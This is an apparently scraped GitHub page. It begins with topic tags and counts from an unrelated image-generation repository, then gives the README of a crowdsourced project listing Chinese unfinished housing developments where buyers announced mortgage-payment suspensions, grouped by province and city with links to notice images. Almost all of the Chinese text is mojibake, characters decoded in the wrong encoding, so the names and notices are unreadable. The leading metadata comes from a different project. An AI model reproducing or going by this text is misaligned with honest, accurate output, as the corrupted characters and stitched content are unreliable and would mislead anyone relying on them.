deep-learning,diffusion,image-generation,pytorch,score-based-generative-modeling,image2image,text2image,stable-diffusion,stable-diffusion-diffusers,hacktoberfest
72
857
4,369
4,246
395
360
24
WeNeedHome/SummaryOfLoanSuspension
# ๅ…จๅ›ฝๅ„็œๅธ‚็ƒ‚ๅฐพๆฅผๅœ่ดทๆ–ญไพ›้€š็Ÿฅๆฑ‡ๆ€ป ## ๆ•ฐๆฎๆฅๆบ็ปŸ่ฎกไปฅๅŠๅ‘่ตทไบบ๏ผš ๅทฒ่ขซๅฐ็ฆ *้žไธ“ไธš็ฒพ็กฎๆ•ฐๆฎ๏ผŒไป…ไพ›ๅ‚่€ƒ๏ผŒไธŽๆ•ฐๆฎๆจก็ณŠๅˆ†ๆž* *ๆ•ฐๆฎๅผ€ๆ”พ่ฝฌ่ฝฝๅผ•็”จ๏ผŒไฝ†่ฏทๆณจๆ˜Žๅ‡บๅค„๏ผŒ้žๅธธๆ„Ÿ่ฐข๏ผ* *่ฟ™้‡Œไธๅšไปปไฝ•้žๆ•ฐๆฎๆ€ง่ดจ็ญ‰ๅ…ถไป–ไธ€็ณปๅˆ—่ฎจ่ฎบ๏ผŒๅชๆ˜ฏ็ปŸ่ฎกไธ€ไธชๆ•ฐๆฎ๏ผŒๆœ‰้”™ๅฐฑ็บ ๆ”น๏ผŒๆ— ๅ…ถไป–ไปปไฝ•ๅซไน‰๏ผŒๅˆซ็š„่ฏทๅ‹ฟๅคš่จ€๏ผ็ฆๆญขๆ”ฟๆฒปๆ•ๆ„Ÿ่ฏ้ข˜๏ผ* *่ฆ็›ธไฟกๅ…š๏ผŒ็›ธไฟกๆ”ฟๅบœใ€‚ๅ…šๅ’Œๆ”ฟๅบœไธ€ๅฎšไผš็ป™ไบบๆฐ‘็พคไผ—ไธ€ไธชๆปกๆ„็š„ไบคไปฃ๏ผŒ่ฟ™้‡Œไป…ไฝœๆ•ฐๆฎ็ปŸ่ฎก๏ผŒๅˆ‡ๅ‹ฟๆœ‰่ฟ‡ๆฟ€่จ€่ฎบ๏ผ* [--> ๆฏ›ไธปๅธญๅœจ 1962 ๅนดไธƒๅƒไบบๅคงไผšไธŠ็š„่ฎฒ่ฏ](https://www.marxists.org/chinese/maozedong/1968/5-016.htm) [--> ไบ’ๅธฎไบ’ๅŠฉ็•™่จ€่ฎจ่ฎบๅŒบ=>](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions) ๏ผˆ้ตๅฎˆ่ง„ๅˆ™ๆ‹’็ปๆ”ฟๆฒปๆ•ๆ„Ÿ๏ผŒไธ็„ถไผšๅ†ๆฌกๅ…ณ้—ญ discussionใ€‚๏ผ‰ [--> ็›ธๅ…ณๆณ•ๅพ‹ไธŽๅฎกๅˆคๆกˆไพ‹ๆ”ฏๆŒ](็›ธๅ…ณๆณ•ๅพ‹ไธŽๅฎกๅˆคๆกˆไพ‹ๆ”ฏๆŒ.md) ## ้กน็›ฎๅๅŒ ### ่ฎกๅˆ’ [--> TODO](./TODO.md) ### ๆไบค 1. [--> 1. ๆ–ฐๆ‰‹่ฏท็œ‹๏ผšๅฆ‚ไฝ•ๆไบค้กน็›ฎไฟกๆฏ](PR-instruction.md) 2. [--> 2. ๆทปๅŠ ่ฏท็œ‹๏ผšๆ–ฐๅขžๅœ่ดท้กน็›ฎ่ง„่Œƒ](CONTRIBUTING.md) 3. [--> 3. ๅ†ฒ็ช่ฏท็œ‹๏ผšๅฆ‚ไฝ•ไฟฎๆญฃๆไบคๅ†ฒ็ช](PR-resolving-conflicts.md) ๅ…ถไธญ๏ผŒๆไบคไน‹ๅ‰่ฏท็กฎไฟ้ชŒ่ฏ่ƒฝ่ฟ‡๏ผš ```shell sh ./run-validate.sh ``` ### ๅผ€ๅ‘ - [--> ๅŽ็ซฏ](development/backend/README.md) - [--> ๅ‰็ซฏ](development/frontend/README.md) 1. :sparkles: ๆœฌ้กน็›ฎๅทฒ้›†ๆˆCI๏ผŒๅฐ†่‡ชๅŠจๆ ธ้ชŒๆ•ฐๆฎ็š„็ปŸ่ฎกๅ‡†็กฎๆ€ง๏ผŒๅ…ทไฝ“่ง๏ผš[backend-nodejs](./development/backend/nodejs/README.md) 2. :rocket: 20220719 ๅทฒๅฎž็Žฐๅผ€ๅ‘ๅ•†ๆ•ฐๆฎๆŠ“ๅ–๏ผŒไฝ†่ฟ˜้œ€่ฆๆ›ดๅคš็š„ๅ•ๅ…ƒๆต‹่ฏ•ไธŽๆ ทๆœฌๆต‹่ฏ•๏ผŒๅ…ทไฝ“่ง๏ผš[็ˆฌ่™ซๅผ€ๅ‘่€…ๆ€ฅ้›†ไปค๐Ÿš€ #950](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/950) 3. :zap: 20220720 ๅ‡็บง readme ๆ–‡ๆกฃ๏ผŒๅทฒๆ”ฏๆŒ๏ผˆไธŽๆŽจ่๏ผ‰ๆข่กŒ็ผ–่พ‘ๆฅผ็›˜ไฟกๆฏ 4. 20220721๏ผš 1. :rocket: ๅขžๅŠ ไบ†ไธ€ไธชๅŸบไบŽ dotnet ๅฎž็Žฐ็š„ GitHub proxy๏ผŒ่ฏฆ่ง [#953](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/953) 2. :sparkles: ๅ‡็บงไบ†ๅœฐๅ›พ๏ผŒๆ˜พ็คบไธญๆ–‡ๆฐดๅฐ๏ผŒๅœจ readme ไธญ็›ดๆŽฅๆŸฅ็œ‹ๅณๅฏ ## ๆ•ฐๆฎๆฆ‚่ฆ ### ็ป“ๆž„ๅŒ–ๆ•ฐๆฎ - [ๆฅผ็›˜ๅœ่ดทๆ•ฐๆฎ(FLAT็‰ˆ)](data/generated/properties-flat.json)๏ผˆๅซ็œๅธ‚ๅŒบใ€้“พๆŽฅ๏ผ‰ - [ๆฅผ็›˜ๅœ่ดทๆ•ฐๆฎ(TREE็‰ˆ)](data/generated/properties-tree.json)๏ผˆๅซ็œๅธ‚ๅŒบใ€้“พๆŽฅ๏ผ‰ - [ๅŸŽๅธ‚ๅœ่ดทๆ•ฐๆฎ](data/generated/cities-for-visualization.json)๏ผˆๅซ็œๅธ‚ๅŒบใ€ๆฅผ็›˜็ปŸ่ฎกๆ•ฐใ€็ป็บฌๅบฆ๏ผ‰ ### ๅ…จๅ›ฝๅœ่ดทๅœฐๅ›พ <details> <summary><b>็‚นๅ‡ปๆŸฅ็œ‹๏ผšๅ…จๅ›ฝๅœ่ดทๅœฐๅ›พ๏ผˆๆต…่‰ฒ๏ผ‰</b></summary> <img src="data/generated/visualization-light-wwm.png" alt="visualization-light"> </details> <details> <summary><b>็‚นๅ‡ปๆŸฅ็œ‹๏ผšๅ…จๅ›ฝๅœ่ดทๅœฐๅ›พ๏ผˆๆทฑ่‰ฒ๏ผ‰</b></summary> <img src="data/generated/visualization-dark-wwm.png" alt="visualization-dark"> </details> <details> <summary><b>็‚นๅ‡ปๆŸฅ็œ‹๏ผšๅœจ็บฟๅœฐๅ›พ๏ผ</b></summary> ๆˆ‘ไปฌๅšไบ†ไธ€ไธชๅœจ็บฟๅœฐๅ›พ๏ผŒๆฅ่ฎฉไธๆ–นไพฟไฝฟ็”จ GitHub ็š„ๆ™ฎ้€šไบบ็œ‹ๅˆฐ่ฟ™ไบ›ๆ•ฐๆฎใ€‚<br> * ๅŸŸๅ๏ผšhttps://building.lulaolu.com<br> * ไป“ๅบ“๏ผšhttps://github.com/ritajie/incomplete-projects ๆฌข่ฟŽๆฅไธบ่ฟ™ไธชๅœฐๅ›พๅš่ดก็Œฎ๏ผ ![alt text](https://github.com/ritajie/incomplete-projects/blob/master/incomplete_projects/static/img/demo.png?raw=true) </details> ### ๅ…ถไป–ๆ•ฐๆฎๅ…ฌ็คบๅค„ - ~~้กน็›ฎๅ‘่ตทไบบ~~ (่ขซ ban ไบ†๏ผ‰ - ~~[ๆˆ‘ๆฅๆ–‡ๆกฃ](https://www.wolai.com/xutejcDgz9B3aTcrRCjxB1)~~ ๏ผˆ20220717ๅทฒๆ— ๆŸฅ็œ‹ๆƒ้™๏ผ‰ - ~~[Notion ๆ•ฐๆฎๅบ“](https://www.notion.so/21dab14200e2478eb91c49b68d16495f)~~ ( 20220717ๅทฒ่ขซๆถๆ„ๅˆ ้™ค) ## ๅˆ†็œๆ•ฐๆฎ (ๆ€ป่ฎก๏ผšใ€**349+**ใ€‘๏ผŒๆŒ‰ไธ‰็บงๆ‹ผ้Ÿณๅ‡ๅบ๏ผ‰ ### ๅฎ‰ๅพฝ็œ [ 2 ] - **ๅˆ่‚ฅๅธ‚๏ผˆ2๏ผ‰๏ผš** [ๆ’ๅคงไธญๅฟƒ๏ผˆ8ๆœˆ๏ผ‰](images/ๅฎ‰ๅพฝ็œ/ๅˆ่‚ฅๅธ‚/ๅˆ่‚ฅๆ’ๅคงไธญๅฟƒๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), ๆ–ฏ็‘žๅคงๅŽฆ ### ๅŒ—ไบฌๅธ‚ [ 4 ] - **ๆœ้˜ณๅŒบ๏ผˆ1๏ผ‰๏ผš** [ไธŠไธœ้ƒก๏ผˆๆพœๆ‚ฆๆ™ฏ่‹‘๏ผ‰](images/ๅŒ—ไบฌๅธ‚/ๆœ้˜ณๅŒบ/ๆพœๆ‚ฆๆ™ฏ่‹‘.jpeg) - **ๆˆฟๅฑฑๅŒบ๏ผˆ1๏ผ‰๏ผš** [้•ฟๆตทๅพกๅข…ไธ‰ๆœŸ](images/ๅŒ—ไบฌๅธ‚/ๆˆฟๅฑฑๅŒบ/_ๅŒ—ไบฌ้•ฟๆตทๅพกๅข…ไธ‰ๆœŸ) - **็Ÿณๆ™ฏๅฑฑๅŒบ๏ผˆ1๏ผ‰๏ผš** [็ฆงๆ‚ฆๅญฆๅบœ๏ผˆๆ‚ฆๅˆ›ไฝณ่‹‘๏ผ‰](images/ๅŒ—ไบฌๅธ‚/็Ÿณๆ™ฏๅฑฑๅŒบ/็ฆงๆ‚ฆๅญฆๅบœ.jpeg) - **้€šๅทžๅŒบ๏ผˆ1๏ผ‰๏ผš** [็ฆนๆดฒๆœ—ๅปทๆนพ๏ผˆๆœ—ๅปท้›…่‹‘๏ผ‰](images/ๅŒ—ไบฌๅธ‚/้€šๅทžๅŒบ/ๅŒ—ไบฌ็ฆนๆดฒๆœ—ๅปทๆนพ.jpeg) ### ้‡ๅบ†ๅธ‚ [ 14 ] - **ๅทดๅ—ๅŒบ๏ผˆ2๏ผ‰๏ผš** ๆ’ๅคงๆ–ฐๅŸŽๅ››ๆœŸ, [ไธ–่Œ‚ยทๆฑŸๅŸŽ้“ญ่‘—](images/้‡ๅบ†ๅธ‚/ๅทดๅ—ๅŒบ/_ไธ–่Œ‚ยทๆฑŸๅŸŽ้“ญ่‘—) - **็’งๅฑฑๅŒบ๏ผˆ1๏ผ‰๏ผš** [็’งๅฑฑๅŒบ่žๅˆ›ๅŸŽ๏ผˆ9ๆœˆ๏ผ‰](images/้‡ๅบ†ๅธ‚/็’งๅฑฑๅŒบ/้‡ๅบ†_็’งๅฑฑ_่žๅˆ›ๅŸŽ.jpg) - **ๅคงๆธกๅฃๅŒบ๏ผˆ1๏ผ‰๏ผš** [ๆ’ๅคง้บ“ๅฑฑๆน–๏ผˆ9ๆœˆ๏ผ‰](images/้‡ๅบ†ๅธ‚/ๅคงๆธกๅฃๅŒบ/้‡ๅบ†ๅธ‚ๅคงๆธกๅฃๅŒบๆ’ๅคง้บ“ๅฑฑๆน–ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **้ป”ๆฑŸๅŒบ๏ผˆ2๏ผ‰๏ผš** ๅฏŒๅŠ›้™ขๅฃซๅปถ็…ๅขƒ, ๆ’ๅคงๅ้ƒฝ๏ผˆ7ๆœˆ๏ผ‰ - **ๆฒ™ๅชๅๅŒบ๏ผˆ1๏ผ‰๏ผš** [ไฝณๅ…†ไธšยทๅ‡ค้ธฃๆฐดๅฒธ๏ผˆ9ๆœˆ๏ผ‰](images/้‡ๅบ†ๅธ‚/ๆฒ™ๅชๅๅŒบ/้‡ๅบ†_ไฝณๅ…†ไธšๅ‡ค้ธฃๆฐดๅฒธ.jpg) - **ไธ‡ๅทžๅŒบ๏ผˆ2๏ผ‰๏ผš** [ๅคฉไป™ๆน–้ป„้‡‘ๆตทๅฒธ๏ผˆ10ๆœˆ๏ผ‰](images/้‡ๅบ†ๅธ‚/ไธ‡ๅทžๅŒบ/้‡ๅบ†ๅธ‚ไธ‡ๅทžๅŒบๅคฉไป™ๆน–้ป„้‡‘ๆตทๅฒธๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด10ๆœˆ1ๆ—ฅ่ตทๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅๅ‡ฝ.jpg), ไธ‡่ƒๅŸŽไบŒๆœŸ๏ผˆ12ๆœˆ๏ผ‰ - **ๆธๅŒ—ๅŒบ๏ผˆ5๏ผ‰๏ผš** ่Š™่“‰ๅ…ฌ้ฆ†๏ผˆ9ๆœˆ๏ผ‰, ๆ’ๅคง่ฝจ้“ๆ—ถไปฃไบŒๆœŸ, ่“ๅ…‰ๆœชๆฅๅŸŽ, [่žๅˆ›้šๆบชๆ™“้™ขไธ€ไบŒไธ‰ๆœŸ](images/้‡ๅบ†ๅธ‚/ๆธๅŒ—ๅŒบ/้‡ๅบ†ๅธ‚ๆธๅŒ—ๅŒบ่žๅˆ›้šๆบชๆ™“้™ขๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดท้ข„ๅ‘Šไนฆ.png), [้˜ณๅ…‰ๅŸŽๆœชๆฅๆ‚ฆไบŒๆœŸ๏ผˆ7ๆœˆ๏ผ‰](images/้‡ๅบ†ๅธ‚/ๆธๅŒ—ๅŒบ/้˜ณๅŸŽๆœชๆฅๆ‚ฆไบŒๆœŸ.jpg) ### ็ฆๅปบ็œ [ 4 ] - **็ฆๅทžๅธ‚๏ผˆ4๏ผ‰๏ผš** [ๆ’ๅคงๅคฉ็’ŸไบŒๆœŸ](images/็ฆๅปบ็œ/็ฆๅทžๅธ‚/็ฆๅทžๅธ‚ๆ’ๅคงๅคฉ็’ŸไบŒๆœŸๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด8ๆœˆๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpg), [ๅนณๆฝญ็ปผๅˆๅฎž้ชŒๅŒบ้‡‘้กบๆ–ฐๅ…‰ๆ˜ŽๅŸŽ๏ผˆ9ๆœˆ๏ผ‰](images/็ฆๅปบ็œ/็ฆๅทžๅธ‚/ๅนณๆฝญ็ปผๅˆๅฎž้ชŒๅŒบ้‡‘้กบๆ–ฐๅ…‰ๆ˜ŽๅŸŽๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด9ๆœˆๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpg), [ไธ–่Œ‚ๆณฐ็ฆพ้’ไบ‘ๅฐ้•‡๏ผˆ9ๆœˆ๏ผ‰](images/็ฆๅปบ็œ/็ฆๅทžๅธ‚/ๆฐธๆณฐ้’ไบ‘ๅฐ้•‡ๅƒไฝ™ๆˆทไธšไธป่”ๅๅ‘ๅธƒๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), [ๅคฉๆณฝๅฅฅ่Žฑๆ—ถไปฃ๏ผˆ8ๆœˆ๏ผ‰](images/็ฆๅปบ็œ/็ฆๅทžๅธ‚/็ฆๅทžๅธ‚ๅฅฅ่Žฑๆ—ถไปฃ.jpg) ### ็”˜่‚ƒ็œ [ 2 ] - **ๅ…ฐๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๅ…ฐๅทžๆ–ฐๅŒบ็ปฟๅœฐๆ™บๆ…ง้‡‘่žๅŸŽๅ…ญๆœŸๅบทๅ…ป่ฐท](images/็”˜่‚ƒ็œ/ๅ…ฐๅทžๅธ‚/ๅ…ฐๅทžๆ–ฐๅŒบ็ปฟๅœฐๆ™บๆ…ง้‡‘่žๅŸŽๅ…ญๆœŸๅบทๅ…ป่ฐท.jpeg) - **ๅบ†้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๅ›ฝ้‡‘one๏ผˆ11ๆœˆ๏ผ‰ ### ๅนฟไธœ็œ [ 8 ] - **ๅนฟๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** [ไธ‡็ง‘ๆตทไธŠๆ˜Žๆœˆ๏ผˆ9ๆœˆ๏ผ‰](images/ๅนฟไธœ็œ/ๅนฟๅทžๅธ‚/gz001.png) - **ๆญ้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคง็ฟก็ฟ ๅŽๅบญไบŒๆœŸ - **ๆฑ•ๅคดๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคง้‡‘็ขงๅค–ๆปฉๆนพ๏ผˆๅ…ซๆœˆ๏ผ‰ - **ๆทฑๅœณๅธ‚๏ผˆ3๏ผ‰๏ผš** ไฝณๅ…†ไธšๆ—ถไปฃๅคงๅŽฆ, [ไฝณๅ…†ไธšๆจพไผดๅฑฑ](images/ๅนฟไธœ็œ/ๆทฑๅœณๅธ‚/sz001.jpg), [ๅ‰ๆตทๅคฉๅขƒ่Šฑๅ›ญ](images/ๅนฟไธœ็œ/ๆทฑๅœณๅธ‚/sz003.jpg) - **ๆน›ๆฑŸๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๅดๅทๅฅฅๅ›ญๅ† ๅ†›ๅŸŽไธ€ๆœŸ](images/ๅนฟไธœ็œ/ๆน›ๆฑŸๅธ‚/_ๅดๅทๅฅฅๅ›ญๅ† ๅ†›ๅŸŽไธ€ๆœŸ) - **ไธญๅฑฑๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆณฐ็ฆพ้‡‘ๅฐŠๅบœ ### ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ [ 24 ] - **ๅŒ—ๆตทๅธ‚๏ผˆ1๏ผ‰๏ผš** [่žๅˆ›ๆตทๆ˜ ๅ…ฐๅฑฟไธ‰ๆœŸ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๅŒ—ๆตทๅธ‚/ๅนฟ่ฅฟๅŒ—ๆตทๅธ‚่žๅˆ›ๆตทๆ˜ ๅ…ฐๅฑฟไธ‰ๆœŸไธšไธป้›†ไฝ“ไธญๆญข่ฟ˜่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๅด‡ๅทฆๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๅนฟ่ฅฟๆ‰ถ็ปฅๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅบทๅ…ปๅŸŽ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๅด‡ๅทฆๅธ‚/ๅนฟ่ฅฟๆ‰ถ็ปฅๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅบทๅ…ปๅŸŽๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๆก‚ๆž—ๅธ‚๏ผˆ7๏ผ‰๏ผš** [ๆก‚ๆž—ๆ’ๅคงๅŸŽ๏ผˆ10ๆœˆ๏ผ‰](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆก‚ๆž—ๅธ‚/ๆก‚ๆž—ๆ’ๅคงๅŸŽ.jpg), [ๆก‚ๆž—่žๅˆ›ๆ–‡ๆ—…ๅŸŽN4ๅœฐๅ—](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆก‚ๆž—ๅธ‚/_ๆก‚ๆž—่žๅˆ›ๆ–‡ๆ—…ๅŸŽN4ๅœฐๅ—), ็ตๅทๆฑ‡้‡‘ไธ‡่ฑกๆ–ฐๅŸŽ๏ผˆ11ๆœˆ๏ผ‰, [่žๅˆ›ๆ–‡ๆ—…ๅŸŽN5ๅœฐๅ—๏ผˆ12ๆœˆ๏ผ‰](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆก‚ๆž—ๅธ‚/ๆก‚ๆž—่žๅˆ›ๆ–‡ๆ—…ๅŸŽN5ๅœฐๅ—ๆฝไบ‘ๅบœ่ฅฟ่‹‘ๅ…จไฝ“ไธšไธปๅผบๅˆถๅปถๆœŸ่ฟ˜่ดทๅ‘Š็Ÿฅไนฆ.png), [่žๅˆ›ๆ–‡ๆ—…ๅŸŽN7ๅœฐๅ—๏ผˆ10ๆœˆ๏ผ‰](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆก‚ๆž—ๅธ‚/ๆก‚ๆž—่žๅˆ›N7.png), [ๅฑฑๆฐดๅ›ฝ้™…](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆก‚ๆž—ๅธ‚/ๅฑฑๆฐดๅ›ฝ้™…ๅ’ŒๅฑฑๆฐดๅŽๅบญๅœ่ดทๅ‘Š็Ÿฅๅ‡ฝ.jpg), [ๅฑฑๆฐดๅŽๅบญ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆก‚ๆž—ๅธ‚/ๅฑฑๆฐดๅ›ฝ้™…ๅ’ŒๅฑฑๆฐดๅŽๅบญๅœ่ดทๅ‘Š็Ÿฅๅ‡ฝ.jpg) - **ๆŸณๅทžๅธ‚๏ผˆ2๏ผ‰๏ผš** [ๆ’ๅคงๅŸŽไบŒๆœŸใ€ไธ‰ๆœŸ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆŸณๅทžๅธ‚/ๆŸณๅทžๆ’ๅคงไบŒไธ‰ๆœŸๅœ่ดท.jpg), [้นฟๅฏจๅŽฟ้บ“ๆน–ๅ…ฌๅ›ญ้‡Œ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆŸณๅทžๅธ‚/้นฟๅฏจๅŽฟ้บ“ๆน–ๅ…ฌๅ›ญ้‡Œๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด8ๆœˆ20ๆ—ฅๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpg) - **ๅ—ๅฎๅธ‚๏ผˆ9๏ผ‰๏ผš** [ไธœ้ผŽ้›ๅ’Œๅบœ๏ผˆ9ๆœˆ๏ผ‰](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๅ—ๅฎๅธ‚/ๅ—ๅฎไธœ้ผŽ้›ๅ’Œๅบœ.png), ๆฑŸๅฎ‡ไธ–็บชๅ…ฌ้ฆ†, ้‡‘็ง‘ๅš็ฟ ๅฑฑ, ่“ๅ…‰้›้”ฆๆพœๆนพ, [ๅ—ๅฎๆ’ๅคงๅŽๅบœไบŒๆœŸ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๅ—ๅฎๅธ‚/ๅ—ๅฎๆ’ๅคงๅŽๅบœไบŒๆœŸๅ‘Š็Ÿฅไนฆ.png), ่žๅˆ›่žๅ…ฌ้ฆ†11ใ€12ๅทๆฅผ๏ผˆ8ๆœˆ๏ผ‰, [ไบ”่ฑกๆพœๅบญๅบœๆฒ่‹‘](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๅ—ๅฎๅธ‚/ๅ—ๅฎๅธ‚ไบ”่ฑกๆพœๅบญๅบœๆฒ่‹‘.png), ไบ”่ฑกๆพœๅบญๅบœ่‡ป่‹‘, [ไธญ้ผŽๅ…ฌๅ›ญๅบœ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๅ—ๅฎๅธ‚/ๅนฟ่ฅฟ็œๅ—ๅฎๅธ‚ไธญ้ผŽๅ…ฌๅ›ญๅบœๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **้’ฆๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคงๅพกๆ™ฏๅŠๅฒ›ไบŒๆœŸ - **ๆขงๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆ’ๅคง็ปฟๆดฒไบŒๆœŸ๏ผˆ8ๆœˆ๏ผ‰](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/ๆขงๅทžๅธ‚/ๆขงๅทžๆ’ๅคงไบŒๆœŸๅœ่ดท.png) - **็Ž‰ๆž—ๅธ‚๏ผˆ2๏ผ‰๏ผš** [ๅŒ—ๆตๅธ‚ไธ‰็Žฏๆ–ฐๅŸŽไบŒๆœŸ](images/ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ/็Ž‰ๆž—ๅธ‚/็Ž‰ๆž—ๅŒ—ๆตๅธ‚ไธ‰็Žฏๆ–ฐๅŸŽๅœ่ดท.png), ไธญ้ผŽ็ปฟๅŸŽไธญๅฟƒ ### ่ดตๅทž็œ [ 2 ] - **่ดต้˜ณๅธ‚๏ผˆ2๏ผ‰๏ผš** ไธญ็Žฏๅ›ฝ้™…้˜…ๆน–, [ไธญๅคฉยทๅพไนก](images/่ดตๅทž็œ/่ดต้˜ณๅธ‚/_ไธญๅคฉยทๅพไนก) ### ๆฒณๅŒ—็œ [ 24 ] - **ไฟๅฎšๅธ‚๏ผˆ3๏ผ‰๏ผš** [้š†ๅŸบๆณฐๅ’Œๆถฟๅทž้“‚ๆ‚ฆๅฑฑ](images/ๆฒณๅŒ—็œ/ไฟๅฎšๅธ‚/้š†ๅŸบๆณฐๅ’Œๆถฟๅทž้“‚ๆ‚ฆๅฑฑ้กน็›ฎๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), [้š†ๅŸบๆณฐๅ’Œๆถฟๅทž็ดซๆ‚ฆๅฐๅŒบ](images/ๆฒณๅŒ—็œ/ไฟๅฎšๅธ‚/ๆถฟๅทžๅธ‚้š†ๅŸบๆณฐๅ’Œ็ดซๆ‚ฆๅฐๅŒบ.jpeg), ไธŠไธœๅพกๆ™ฏ - **ๆฒงๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** [็ดซๆจพ้ฆ™ๆฆญ](images/ๆฒณๅŒ—็œ/ๆฒงๅทžๅธ‚/ๆฒงๅทžๅธ‚็ดซๆจพ้ฆ™ๆฆญๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg) - **ๆ‰ฟๅพทๅธ‚๏ผˆ1๏ผ‰๏ผš** ็Šถๅ…ƒๅบœ - **้‚ฏ้ƒธๅธ‚๏ผˆ2๏ผ‰๏ผš** [ๆ’ๅคง็ปฟๆดฒ](images/ๆฒณๅŒ—็œ/้‚ฏ้ƒธๅธ‚/้‚ฏ้ƒธๆ’ๅคง็ปฟๆดฒ.jpg), [ๆ’ๅคงๆ‚ฆ็‘ๆนพ](images/ๆฒณๅŒ—็œ/้‚ฏ้ƒธๅธ‚/้‚ฏ้ƒธๆ’ๅคง.jpg) - **ๅปŠๅŠๅธ‚๏ผˆ5๏ผ‰๏ผš** ้ธฟๅคๅ‡คๅ‡ฐๅŸŽไบ”ๆœŸ๏ผˆ8ๆœˆ๏ผ‰, ้ธฟๅค็†ๆƒณๅŸŽ, [ๅŽๅคๅนธ็ฆยทๅ››ๅญฃๅ…ฌ้ฆ†](images/ๆฒณๅŒ—็œ/ๅปŠๅŠๅธ‚/ๆฒณๅŒ—ๅปŠๅŠๅธ‚ๅคงๅŽ‚ๅ›žๆ—่‡ชๆฒปๅŽฟๅ››ๅญฃๅ…ฌ้ฆ†ๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), ๅŽๅคๅนธ็ฆๅญ”้›€ๅŸŽๅคง่ฟๆฒณๆ™บๆ…ง่ก—ๅŒบ๏ผˆ้ฆ™ๆฒณ๏ผ‰, ็›ˆๆ—ถยทๆœชๆฅๆธฏ - **็Ÿณๅฎถๅบ„ๅธ‚๏ผˆ7๏ผ‰๏ผš** [ๅฎ‰่”็”Ÿๆ€ๅŸŽๅ‡ฏๆ—‹ๅบœ](images/ๆฒณๅŒ—็œ/็Ÿณๅฎถๅบ„ๅธ‚/็Ÿณๅฎถๅบ„ๅธ‚ๅฎ‰่”็”Ÿๆ€ๅŸŽๅ‡ฏๆ—‹ๅบœๅ…จไฝ“่ดงๆฌพไธšไธปๅผบๅˆถๅœ่ดงๅ‘Š็Ÿฅไนฆ.jpeg), ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ๏ผˆ8ๆœˆ๏ผ‰, ๆ’ๅคงๆ‚ฆ้พ™ๅฐ, ๆ’ๆถฆไธญๅคฎๅนฟๅœบ, [่žๅˆ›ๅŸŽไธ€ๆœŸ๏ผˆ11ๆœˆ๏ผ‰](images/ๆฒณๅŒ—็œ/็Ÿณๅฎถๅบ„ๅธ‚/็Ÿณๅฎถๅบ„่žๅˆ›ๅŸŽไธ€ๆœŸๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด11ๆœˆๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), 